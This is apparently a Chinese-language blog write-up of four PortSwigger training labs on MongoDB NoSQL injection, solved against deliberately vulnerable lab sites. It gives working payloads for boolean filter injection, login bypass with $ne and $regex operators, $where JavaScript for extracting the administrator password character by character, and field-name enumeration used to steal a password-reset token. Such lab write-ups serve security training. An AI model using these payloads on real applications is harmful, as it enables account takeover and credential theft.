PortSwigger NoSQL injection

Lab: Detecting NoSQL injection

The product category filter for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection.

To solve the lab, perform a NoSQL injection attack that causes the application to display unreleased products.

题目让我们查出未发布的产品

尝试单引号闭合，返回了 mongoDB 报错,而且再加一个单引号又没有语法错误了

1 2	category=Gifts' category=Gifts''

尝试 nosql 语法影响布尔条件（特殊字符最后要 url 编码）

1 2	Gifts'&&1&&'a Gifts'&&0&&'a

可以确定能影响布尔条件了，下一步覆盖现有条件来利用漏洞

1	Gifts'\|\|'1'=='1

Lab: Exploiting NoSQL operator injection to bypass authentication

The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.

To solve the lab, log into the application as the administrator user.

You can log in to your own account using the following credentials: wiener:peter.

运算符来绕过身份验证

1	{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}

无果，尝试爆破用户

1	{"username":{"$in":["carlos","administrator","superadmin"]},"password":{"$ne":""}}

找到个 carlos 普通用户，爆破不出来。

尝试正则表达式运算符

1	{"username":{"$regex":"^admin"},"password":{"$ne":""}}

成功，得到用户名是 adminekuui50r，果然爆破不出来

Lab: Exploiting NoSQL injection to extract data

The user lookup functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection.

To solve the lab, extract the password for the administrator user, then log in to their account.

You can log in to your own account using the following credentials: wiener:peter.

再很多的 nosql 数据库中，一些请求操作符或者函数可以运行有限的 js 代码，比如说 mongoDB 的 $where

假如有个用户查询接口

1	https://insecure-website.com/user/lookup?username=admin

后端逻辑

1	{"$where":"this.username == 'admin'"}

可以尝试 js 代码

1	admin' && this.password[0] == 'a' \|\| 'a'=='b

payload

1	user=administrator'%26%26this.password[0]=='a'\|\|'a'=='b

然后就是一位一位爆破密码

Lab: Exploiting NoSQL operator injection to extract unknown fields

The user lookup functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection.

To solve the lab, log in as carlos.

来到登陆界面，尝试在密码处插入操作符

{
  "username":"carlos",
  "password":{"$ne":""}
}

返回账户被锁定，得重置密码。但是重置密码后要求我们检查邮箱，这点我们是办不到的，翻看 js 代码也没有关于重置密码的有用信息。

查看提示，要我们泄漏重置密码的 token 值，也就是发往用户邮箱的值。

先尝试泄漏有关 token 的字段名,继续前往登陆用户处查看是否支持 $where

{
  "username":"carlos",
  "password":{"$ne":""},
  "$where": "0"
}

{
  "username":"carlos",
  "password":{"$ne":""},
  "$where": "1"
}

返回两种状态，说明成功执行了，插入 js 代码爆破字段名

1
2
3

{"username":"carlos","password":{"$ne":""},
"$where": "Object.keys(this)[0].match('^.{0}a.*')"
}

改变下标得到以下字段名

id
username
password
email
newPwdTkn

所以可以猜测与存储 token 有关的字段名就是 newPwdTkn，复制字段名粘贴到重置密码处

1	/forgot-password?newPwdTkn=123

返回 Invalid token，故技重施，去登陆功能处爆破 token 值

1
2
3

{"username":"carlos","password":{"$ne":""},
"$where": "this.newPwdTkn.match('^.{0}a.*')"
}

得到

1	e08cd061a4f30b0d

访问 /forgot-password?newPwdTkn=e08cd061a4f30b0d 就能直接重置密码了

本文采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。